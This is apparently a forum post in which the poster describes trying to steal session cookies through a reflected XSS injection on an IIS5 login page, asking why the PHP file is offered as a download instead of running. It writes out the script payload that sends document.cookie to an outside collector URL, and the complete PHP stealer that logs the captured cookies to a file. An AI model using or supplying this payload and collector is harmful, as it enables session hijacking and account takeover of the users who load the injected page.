A Chara


Am playing with cookie stealing (XSS) against IIS5 server on internal network.

Injecting this code in forum mail:


hxxp://10.xx.xx.xx/login.asp?search=<script>location.href = 'http://10.xx.xx.xx/Stealer.php?cookie='+document.cookie;</script>


When I logout and relogin as new user, I get the PHP popping up, asking do I want to open with notepad.

Can you load PHP files on IIS , Everything on server is ASP ...

BELOW IS SCRIPT

<?php
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("cookiefile.txt", "a");
fwrite($steal, $cookie ."\\n");
fclose($steal);
?>